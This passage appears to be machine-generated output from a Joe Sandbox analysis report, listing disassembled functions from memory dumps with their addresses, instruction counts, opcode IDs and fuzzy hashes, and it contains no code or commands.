                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4be703e5bce9f0f6f95cb3578da50cbe86c79811e6ba9d83db57d2ca2a87cf2
                                                        • Instruction ID: 4c2dd131f10e74553d12a4429f5ca74464109ef618dda503be0e1d426b090537
                                                        • Opcode Fuzzy Hash: a4be703e5bce9f0f6f95cb3578da50cbe86c79811e6ba9d83db57d2ca2a87cf2
                                                        • Instruction Fuzzy Hash: C951D130B162858FD708BBB9E99567EBBB2FF85700F4044A9D446D7380DE388949C7A6
                                                        Function 0113C7E0 Relevance: .2, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc990040d77d759812eccf9de630cb6efa7d2e45a8640afcff17703181d942ee
                                                        • Instruction ID: c575fab58e4a613a283e58ba1dede60ad5a18c62d267139c6de4ca12751badc6
                                                        • Opcode Fuzzy Hash: fc990040d77d759812eccf9de630cb6efa7d2e45a8640afcff17703181d942ee
                                                        • Instruction Fuzzy Hash: 64518C30E002099FDB18DBB9C4557EEBBF2BFC8310F15846AE545BB259EB349905CB91
                                                        Function 09AF8D60 Relevance: .1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aba7e9370c4dad1c7ec8aa7620599917db3639272fe758c8df938d8fff0f68e4
                                                        • Instruction ID: b9eb7c0237b1478124036328edfcce4a8e6c32b712a8e1d6a0cd5518bbfae8d5
                                                        • Opcode Fuzzy Hash: aba7e9370c4dad1c7ec8aa7620599917db3639272fe758c8df938d8fff0f68e4
                                                        • Instruction Fuzzy Hash: 4441BE30B212458FD708BBBEE99563EBBB6FF88A00F404469D546E7344DE389945C792
                                                        Function 09AFE949 Relevance: .1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 23c35a46ed5078530e5527d1aca6c4063fbface6c6af47a1bbb6dbe5d0653f2e
                                                        • Instruction ID: 79b52e583a75a2346d9f010e0f7e017c1717351ef5dbc0071d154a84d526dac8
                                                        • Opcode Fuzzy Hash: 23c35a46ed5078530e5527d1aca6c4063fbface6c6af47a1bbb6dbe5d0653f2e
                                                        • Instruction Fuzzy Hash: 5441E8306093C18FD306BB79D8A4529BFF2EFC2610F55859ED0D9CB292DE389816C792
                                                        Function 01138E9A Relevance: .1, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e03e3d6c767efcdde1f078feffeaef44a0a8d8a7913696027ba9f3eb188ac81
                                                        • Instruction ID: 1c05adb63be0fa6ef9940a5fb4df7d5e1d6ece76fca0835a000296da13a10d3d
                                                        • Opcode Fuzzy Hash: 7e03e3d6c767efcdde1f078feffeaef44a0a8d8a7913696027ba9f3eb188ac81
                                                        • Instruction Fuzzy Hash: 0E41C031B002048FCB189B69D894AAE7BB6FFC8714F144569EA0AD7399CF359C17CB90
                                                        Function 01139858 Relevance: .1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e80a0d7772fa2e01af8f310a417e082e87e19cdbfc3fca82a150e4aa234d884e
                                                        • Instruction ID: f3713ad3371e4ff14aa448ea9efd94678eacbc48cbd8f970943ed8c851af98f5
                                                        • Opcode Fuzzy Hash: e80a0d7772fa2e01af8f310a417e082e87e19cdbfc3fca82a150e4aa234d884e
                                                        • Instruction Fuzzy Hash: 4641583160011ACFDB19DF68D888AAA7BB5FF8C314F000469E946CB3A5DBB0DD52CB91
                                                        Function 0113C0E8 Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 49def4c84fbe610340006d06f5de4e8f529120a11d34483819c722e4f018ab22
                                                        • Instruction ID: 49f30400d7b205551ded10768d9439aada3e98cd6c4222dd41da7d5ca9797912
                                                        • Opcode Fuzzy Hash: 49def4c84fbe610340006d06f5de4e8f529120a11d34483819c722e4f018ab22
                                                        • Instruction Fuzzy Hash: B3415C35A04209DFDB5D9BACD598BAD7BB2EBC9300F114427E40ABB25DC7319844CBD2
                                                        Function 01135BC0 Relevance: .1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9440e8efcbea9a95e84515c302cab3ae152564a185be45cc0186d391c5c7fd5e
                                                        • Instruction ID: 1ead903250f8ac8e4c1cf8896ccf8dd757748162a57862f8dd7e74c1a383142a
                                                        • Opcode Fuzzy Hash: 9440e8efcbea9a95e84515c302cab3ae152564a185be45cc0186d391c5c7fd5e
                                                        • Instruction Fuzzy Hash: 3A3190307002499FCB0AAF68D994AAE3BA6FF88718F044518F9458B359CB79C962DF51
                                                        Function 0113C829 Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ee2a8f0d95f7417d27b32d93e335171cbfbbb0a449ab82c13b2bc27b0dfe33b
                                                        • Instruction ID: f77de561c8f468b16c2a613df110f4da6be4aaa782dc2f4b2f4fff4b05417420
                                                        • Opcode Fuzzy Hash: 4ee2a8f0d95f7417d27b32d93e335171cbfbbb0a449ab82c13b2bc27b0dfe33b
                                                        • Instruction Fuzzy Hash: FA316D31E0025A8BCB19DBB9D4556EEBBF2AFC8320F14846AD515F7249EB309906CB91
                                                        Function 01139C89 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b88bab6fa896ca251db8254426e9bf55c0167e289f88504666e8fa2983a3f292
                                                        • Instruction ID: e8ba46f0608bfa7541cadd183fef033d82774117fa49016b5a35671f01b89af7
                                                        • Opcode Fuzzy Hash: b88bab6fa896ca251db8254426e9bf55c0167e289f88504666e8fa2983a3f292
                                                        • Instruction Fuzzy Hash: FA21B0317042198BDB296B2DC89A77E3B97AFC5718F184039D506CF39EDBA5CC829781
                                                        Function 01139BA0 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76e017508bb1eec0a73b7c35c60fd5f7e2369cc56bb455986ba4ff0faf6f043c
                                                        • Instruction ID: cb8222c98ffef9ba4f9b87864b2b3e0a61b433716474e39a79461d813d99c954
                                                        • Opcode Fuzzy Hash: 76e017508bb1eec0a73b7c35c60fd5f7e2369cc56bb455986ba4ff0faf6f043c
                                                        • Instruction Fuzzy Hash: CE21F93170815D8FDB1DCE6A9880ABFBBEAEBC9354F054426E516CB24DDBB0D841C761
                                                        Function 0113904F Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63d3021b7c9cbd79ec271e5e9110fb980fdf3ff33dd110e7ca4f9bcd7087d669
                                                        • Instruction ID: e08310675f37357fc3d373a2bcc36f40599a3ea08dc3067af01d97c1955d9e88
                                                        • Opcode Fuzzy Hash: 63d3021b7c9cbd79ec271e5e9110fb980fdf3ff33dd110e7ca4f9bcd7087d669
                                                        • Instruction Fuzzy Hash: 3431A870E00509CFCB04DF6CC8889AEBBB6BFC5364B198159D515A73A5CB749C42CB90
                                                        Function 09AFEF7F Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 177b75b867109048941d7a4ec66a9374ff4e7fd4e20fcb3dcbb039a66ba1488e
                                                        • Instruction ID: abd1134e36876d0926685ce6c37588700ccf4dffa661bcccc8fdaaac4b5bcd8d
                                                        • Opcode Fuzzy Hash: 177b75b867109048941d7a4ec66a9374ff4e7fd4e20fcb3dcbb039a66ba1488e
                                                        • Instruction Fuzzy Hash: 2F21FF32B052648FC304BFB9ED9462EBBF6FB88610F44856AD049D7380DE389805C791
                                                        Function 0113704F Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77916865246bbff5a05b3d4c2c5b7966071a8e51b10ed41bc2d701be4243690f
                                                        • Instruction ID: 3fb1fac8bde285a3f7efb85f48fa28462ae81a8c4591e2649dbea8efcaf2f04e
                                                        • Opcode Fuzzy Hash: 77916865246bbff5a05b3d4c2c5b7966071a8e51b10ed41bc2d701be4243690f
                                                        • Instruction Fuzzy Hash: F62104357016118FD7299B29D998A6EBBE2FFC9764B054428E906CB399CF35DC03CB80
                                                        Function 09AFC20D Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c65bc45497c68393ebf2233c52bc5c7ac2a1fd426d6568b2cc99e1968936405
                                                        • Instruction ID: 380992b72918ed1b2bcdc22b4c3d40952099218273f80d2434209bf68f6905ba
                                                        • Opcode Fuzzy Hash: 8c65bc45497c68393ebf2233c52bc5c7ac2a1fd426d6568b2cc99e1968936405
                                                        • Instruction Fuzzy Hash: BF21BA31B11259CBCB44BFB9ED946AEB3B2FF88701F408469D849A7340EE349D05CB91
                                                        Function 0113BF88 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a9296b6c361cd9961a5a52bc8d26946e96f09bfa8b9260a1088c884f961d923
                                                        • Instruction ID: f73fed870562e70e75185340554cdca2548ba00992faa4a111d77b64ff889d72
                                                        • Opcode Fuzzy Hash: 9a9296b6c361cd9961a5a52bc8d26946e96f09bfa8b9260a1088c884f961d923
                                                        • Instruction Fuzzy Hash: 4C316174E0010ADFEB08EBA4D895BAEB7B2FF84304F108069D2016B385DB755E46CB95
                                                        Function 09AFEF90 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 36ccacd39133e32ad1a0704ad4175df54b6680723a662f0225fa42031484d3c8
                                                        • Instruction ID: 18defe77c08fa754c5da89983a3f875b791917f7936205c924703ec97097199b
                                                        • Opcode Fuzzy Hash: 36ccacd39133e32ad1a0704ad4175df54b6680723a662f0225fa42031484d3c8
                                                        • Instruction Fuzzy Hash: 0A11A232B112558FC704BBBAED94B2EB7E5FB88610F404529D449D3344DE38DC15C791
                                                        Function 09AF7DC0 Relevance: .1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b27e9836af5d49c25eb09f728687e8aabe0298778fa9985b81b0a31de63742a3
                                                        • Instruction ID: b603036192622e703c5fa903acd2b0538063938cf936968d77c4c172e8ec5021
                                                        • Opcode Fuzzy Hash: b27e9836af5d49c25eb09f728687e8aabe0298778fa9985b81b0a31de63742a3
                                                        • Instruction Fuzzy Hash: F8213A31A08641CFC309EFB9D8A1679BBE5EFC1714F08889EE495CB781DA389811DF52
                                                        Function 010ED2A8 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377237549.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10ed000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bdd549a3d0b9477ec176c182f853a782b9fdf4d0477578da0eb1d194a2ada8a
                                                        • Instruction ID: 3f96c3c0ca0bca620f0608e7ab0e2bd0e949c7f59ac64e0421ca0c2c265c8029
                                                        • Opcode Fuzzy Hash: 4bdd549a3d0b9477ec176c182f853a782b9fdf4d0477578da0eb1d194a2ada8a
                                                        • Instruction Fuzzy Hash: A32134B1604200DFDB05DFA5D5C8B1AFBE5FB84314F24C6ADE9494B296C33AD846CB61
                                                        Function 010ED0F0 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377237549.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10ed000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c3f550a8637cf324838a5180cde7295a035fab8bd40ed78f476e911a6256ef18
                                                        • Instruction ID: a59a858d097c2ba5d77d87271ffeeb0f09d46f10124d0bbca0ac344cb7490f29
                                                        • Opcode Fuzzy Hash: c3f550a8637cf324838a5180cde7295a035fab8bd40ed78f476e911a6256ef18
                                                        • Instruction Fuzzy Hash: FA210471604204EFDB05DF55D9C8B2ABBE5FB84314F20C5EDE9894B296C336D846CB61
                                                        Function 0113BF98 Relevance: .1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3974cb051973c5441a92fbf206893fe31f15c1961fb4443e5e250a5c93dcafd0
                                                        • Instruction ID: da34942e538f28b4dd0b4852f763a4e2b89a8ea6d20967366f21884ceeed777f
                                                        • Opcode Fuzzy Hash: 3974cb051973c5441a92fbf206893fe31f15c1961fb4443e5e250a5c93dcafd0
                                                        • Instruction Fuzzy Hash: FD214174E0010ADFEB08EBA4D9557AEB7B1FF84304F108129D2156B384DB756E45CB95
                                                        Function 01135BD0 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0bdd2a071c80df8b141b46cee5d9c1afcbb16c638ec7640b157bb724a966ff9f
                                                        • Instruction ID: d2b0e5c76e753453c6e0af2c4e01bf116e13ea9d31aa0769052981b3adcbfb7c
                                                        • Opcode Fuzzy Hash: 0bdd2a071c80df8b141b46cee5d9c1afcbb16c638ec7640b157bb724a966ff9f
                                                        • Instruction Fuzzy Hash: 6911D6317002099FDB09AF29D944A9E3BAAFB84B18F004528F9058B359CF78CD55DF90
                                                        Function 010ED0EB Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377237549.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10ed000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                        • Instruction ID: e496a4c345552e0fa6e799db72177883e1bb75f2a749713dffc1b5e5e7d9f8d8
                                                        • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                        • Instruction Fuzzy Hash: C111BB75504280DFDB06CF54D9D4B15BBA2FB84314F24C6EAD8894B296C33AD44ACB61
                                                        Function 010ED2A3 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377237549.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10ed000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                        • Instruction ID: f53d776a0391850149992ccf87453bcefbfa450aa4d1b2feeb5617788a4b46c7
                                                        • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                        • Instruction Fuzzy Hash: 1511D075504280CFCB06CF64D5C4B15BFA1FB84314F28C6AED8494B2A7C33AD40ACB61
                                                        Function 00F8D7C5 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377024556.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f8d000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 363d94fa146b2dc9ac46a07f56e5ab5135c9b8b59b7353ef19361073bab48e3b
                                                        • Instruction ID: ce63af4e21dca20ffbad6a97da5f7d9f546b342afd1641d16ffb73228473d360
                                                        • Opcode Fuzzy Hash: 363d94fa146b2dc9ac46a07f56e5ab5135c9b8b59b7353ef19361073bab48e3b
                                                        • Instruction Fuzzy Hash: DE01F731404345DAE7209A15DD807A7BB98EF41334F18C45AED081A1C2C3389841D7B1
                                                        Function 01130838 Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ccebc40e8fdaa1a1f4a5f19e3febc0a92aa34ecf42f8beddcae6a9fb4332d290
                                                        • Instruction ID: 5488f55054f0f37326107e52f414e54c3121e9fe214d367b7daada004e77ce79
                                                        • Opcode Fuzzy Hash: ccebc40e8fdaa1a1f4a5f19e3febc0a92aa34ecf42f8beddcae6a9fb4332d290
                                                        • Instruction Fuzzy Hash: 65113570D0020AAFDB41EFA5D8116EEBBF1FB89300F1086AAC155EB365EB354B019B80
                                                        Function 01130848 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc6071a3ff6ee8d990af187551d403ea4f56ff03e0a96b6c176f8854301220f4
                                                        • Instruction ID: 81e01170e5ac3bc25097548ea8e337cff4dcecc9a7c0d380f5d817318b9b38ec
                                                        • Opcode Fuzzy Hash: bc6071a3ff6ee8d990af187551d403ea4f56ff03e0a96b6c176f8854301220f4
                                                        • Instruction Fuzzy Hash: 38010870E0020EAFDB40EFA5D95069EBBF6FB88700F1085AAC155E7354EB355B059B80
                                                        Function 00F8D7C4 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377024556.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f8d000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4165d60d7188e0651691a5fd5ffc6daff3e638399f35a7eba733b0d27311c567
                                                        • Instruction ID: c59439c875532573b307c35d02fae32884e7aba37d9faca8187e76575e44fcdc
                                                        • Opcode Fuzzy Hash: 4165d60d7188e0651691a5fd5ffc6daff3e638399f35a7eba733b0d27311c567
                                                        • Instruction Fuzzy Hash: C3F0CD71804344AAE7208E1AD884BA2FFA8EF81734F18C45AED080E2C2C3789840CBB1
                                                        Function 0113C7D0 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cabb17ef2be8ddcd5621b025fbe5050a316d4befeb4546fb4b0eefd472e07d69
                                                        • Instruction ID: 51591b6cd6ec2af82f311419df93b72330d57710e23d72be13bbacb89b8119b0
                                                        • Opcode Fuzzy Hash: cabb17ef2be8ddcd5621b025fbe5050a316d4befeb4546fb4b0eefd472e07d69
                                                        • Instruction Fuzzy Hash: EDF03735D0028B8ECF41DFA9C9091EEBFB1EF86314F04446AD654B7000E770125ACB90
                                                        Function 09AFEF4E Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5a178582fc3e999798bdb12162c1075cb7c51a05e764df776e8c2d86ec9694e
                                                        • Instruction ID: 6569bb55328d82d033812bf17738ce9eb4146dc665431207a12d3f4100f57612
                                                        • Opcode Fuzzy Hash: e5a178582fc3e999798bdb12162c1075cb7c51a05e764df776e8c2d86ec9694e
                                                        • Instruction Fuzzy Hash: F0F0903150A3CE8FDB16DBB0886649ABF76EE4220571A84DFE8419F563DA39440ACF52
                                                        Function 09AF7D5F Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e94d4c08e9cd1223a2473db4b3f207f6101a436edabb00dbb396aa661c12adb
                                                        • Instruction ID: 93af222fe98f7d169bad218eb9d1c50b51feb3c1943dbd1693b2a004d55c34cb
                                                        • Opcode Fuzzy Hash: 0e94d4c08e9cd1223a2473db4b3f207f6101a436edabb00dbb396aa661c12adb
                                                        • Instruction Fuzzy Hash: 7CF08C3054B3908FC3129F70D5684AA3F39EF1260638944E9E846CB692CF32C417CF11
                                                        Function 09AF7D33 Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6465e0ec7815f31dc6d4d21a9cbf3f6252cc62a1a8c624c264d04c503cb7e46f
                                                        • Instruction ID: ef4dc3e7acf4464cd53c1cb4787e5847ccb144fa800ad302689999dd684f6ef8
                                                        • Opcode Fuzzy Hash: 6465e0ec7815f31dc6d4d21a9cbf3f6252cc62a1a8c624c264d04c503cb7e46f
                                                        • Instruction Fuzzy Hash: ECE0653154B3518FD3025B7199280A63B35EE52A4538E00D6F885C7952CE35C816CB21
                                                        Function 0113C0B9 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
